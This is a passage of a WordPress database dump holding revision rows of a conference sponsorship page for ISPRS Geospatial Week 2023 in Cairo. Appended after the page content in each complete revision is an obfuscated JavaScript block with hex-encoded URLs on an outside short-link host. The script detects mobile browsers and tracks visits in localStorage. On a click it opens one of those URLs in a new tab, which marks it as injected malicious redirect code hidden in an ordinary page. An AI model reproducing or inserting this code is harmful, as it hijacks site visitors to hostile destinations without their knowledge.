_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 12:06:02','2022-10-26 12:06:02','',2920,'https://gsw2023.com/?p=2923',0,'revision','',0),
(2924,1,'2022-10-26 12:19:08','2022-10-26 12:19:08','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"www.isprs.org\">-www.isprs.org.</a></u> </h5>\n<h5></h5>\n<h5>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 12:19:08','2022-10-26 12:19:08','',2920,'https://gsw2023.com/?p=2924',0,'revision','',0),
(2925,1,'2022-10-26 12:20:21','2022-10-26 12:20:21','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5 style=\"text-align:justify; color:black;>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5 style=\"text-align:justify; color:black;>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a href=\"www.isprs.org\">-www.isprs.org.</a></u></h5>\n<h5></h5>\n<h5 style=\"text-align:justify; color:black;>-An exhibition will also be held during the conference. This provides companies in the field with the opportunity to be involved and showcase their products, services, and expertise to an international audience. As a professional, you also get the chance to attend the presentations and follow the latest scientific developments in the field. Conference attendees are free to wander around the exhibition area during the workshops, coffee and lunch breaks. Participants can register for any number of days.</h5>\n<h5></h5>\n<h5 style=\"text-align:justify; color:black;>-A number of sponsorship and exhibition packages are available. Tailor-made options are also available, interested companies to contact the GSW Director Prof. Naser El-Sheimy at <u><a href=\"mailto:elsheimy@ucalgary.ca\">elsheimy@ucalgary.ca</a></u> or Prof. Amr Hanafi at <u><a href=\"mailto:amrhali@feng.bu.edu.eg\">amrhali@feng.bu.edu.eg</a></u> or Prof Alaa Abd El Bary <u><a href=\"mailto:aaelbary@aast.edu\">aaelbary@aast.edu</a></u> for more details on the sponsorship opportunities for the GSW/2023.</h5>\n<h5></h5>\n<h5 style=\"text-align:justify; color:black;>-We hope you will consider the opportunity to participate at the ISPRS Geospatial Week 2023 and look forward to meeting you in Cairo!</h5>\n<h5></h5>\n<h5>The GSW2023 Organizing Committee.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SPONSORSHIP AND EXHIBITION','','inherit','closed','closed','','2920-revision-v1','','','2022-10-26 12:20:21','2022-10-26 12:20:21','',2920,'https://gsw2023.com/?p=2925',0,'revision','',0),
(2926,1,'2022-10-26 12:26:56','2022-10-26 12:26:56','<p>[vc_row][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><strong>ISPRS GEOSPATIAL WEEK 2023</strong></h3>\n<h3 style=\"text-align: center;\"><strong>SPONSORSHIP AND EXHIBITION - Cairo – Egypt 2-7 September 2023</strong></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h5>The Arab Academy for Science, Science, and Maritime Transport as the ISPRS GSW2023 organizer would like to invite you to participate as a sponsor / exhibitor at the Geospatial Week 2023, which will be held in Cairo, Egypt on 2-7 September 2023.</h5>\n<h5></h5>\n<h5>The Geospatial Week is an internationally renowned scientific event held once every two years. The event is organized by the International Society of Photogrammetry and Remote Sensing (ISPRS) to bring together expertise in the fields of photogrammetry, remote sensing, and geospatial information science. Some 1000 to 2000 researchers and professionals from around the world gathered for an entire week to share new findings and experiences through a series</h5>\n<h5>of dedicated workshops. More information regarding ISPRS can be found at:</h5>\n<h5><u><a 